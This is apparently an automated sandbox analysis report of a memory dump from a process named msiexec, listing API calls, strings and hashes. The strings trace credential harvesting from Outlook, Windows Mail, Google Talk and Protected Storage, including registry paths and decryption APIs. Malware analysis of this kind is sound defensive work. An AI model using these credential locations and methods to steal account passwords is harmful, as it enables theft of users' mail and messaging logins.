                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                              Strings
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                              Control-flow Graph

                                                               • Basic blocks of 444c4a-444e0f (CRT startup stub) that carry calls: 444c4a-444c66 call 444e38, GetModuleHandleA; 444cb3-444d00 __set_app_type, __p__fmode, __p__commode, call 444e34; 444d02-444d0d __setusermatherr; 444d0e-444d68 call 444e22, _initterm, __getmainargs, _initterm; 444d8b-444d9c GetStartupInfoA; 444db2-444dc6 GetModuleHandleA, call 40cf44; 444dc8-444dc9 exit; 444dcf-444e0f _cexit, call 444e71
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              • Store Root, xrefs: 004443A5
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 3203569119-2578778931
                                                              • Opcode ID: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                              • Opcode Fuzzy Hash: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                              Control-flow Graph

                                                               • Basic blocks of 40ccd7-40cdd9 that carry calls: 40ccd7-40cd06 ??2@YAPAXI@Z; 40cd11-40cd24 ??2@YAPAXI@Z; 40cd26-40cd2d call 404025; 40cd59-40cd60 DeleteObject; 40cd66-40cdd9 call 407088, call 4019b5, memset, LoadIconA, call 4019b5, _mbscpy
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:
                                                              • API String ID: 2054149589-0
                                                              • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                              • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                              Control-flow Graph

                                                               • Basic blocks of 40ba28-40bb09 that carry calls: 40ba3c-40ba52 call 407e20, _mbsicmp; 40ba54-40ba6d call 407e20; 40ba75-40ba76 call 40b5e5; 40ba87-40ba9b call 406c62; 40ba9d call 4107f1 | 404734 | 404785 | 403c16 (one call site, four resolved targets); 40baa0-40bab3 call 407e30; 40bad8-40baf7 qsort; 40bafa-40bb09 SetCursor
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                              Control-flow Graph

                                                               • Basic blocks of 410dbb-410e97 that carry calls: 410dbb-410dd2 call 410d0e; 410dd4-410ddd call 4070ae; 410dfd-410e1b memset; 410e45-410e4f call 410a9c; 410e51-410e76 call 410d3d, call 410add; 410e7f-410e92 _mbscpy
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$`{g
                                                              • API String ID: 119022999-3561933272
                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                              Control-flow Graph

                                                               • Basic blocks of 4085d2-4086dd that carry calls: 4085d2-408605 call 44b090, call 4082cd, call 410a9c; 40860b-40863d memset, call 410b62; 408642-40865a call 410a9c; 40865c-4086ab memset, call 410add, call 40848b; 4086b1-4086c2 call 410b62
                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                              • String ID: Software\Google\Google Talk\Accounts$`{g
                                                              • API String ID: 3996936265-3112142944
                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                              Control-flow Graph (function 44b33b-44b37b; four conditional calls to ??3@YAXPAX@Z; graph rendered as an image in the original report)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                              Control-flow Graph (function 40ce70-40cf43; calls 4023b2, 401e69, _strcmpi, 40cdda, 40c3d0, 40ba28, 40affa, 40c580; graph rendered as an image in the original report)
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9

                                                              Control-flow Graph (function 404734-404784; calls 404785, LoadLibraryA, GetProcAddress; graph rendered as an image in the original report)
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                              • API String ID: 2238633743-192783356
                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00406E06
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                              • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                              • GetLastError.KERNEL32 ref: 00406E74
                                                              • CloseHandle.KERNEL32(?), ref: 00406E80
                                                              • GetLastError.KERNEL32 ref: 00406E8B
                                                              • CloseClipboard.USER32 ref: 00406E94
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$CloseErrorFileLast$AllocDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 2624330674-0
                                                              • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                              • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
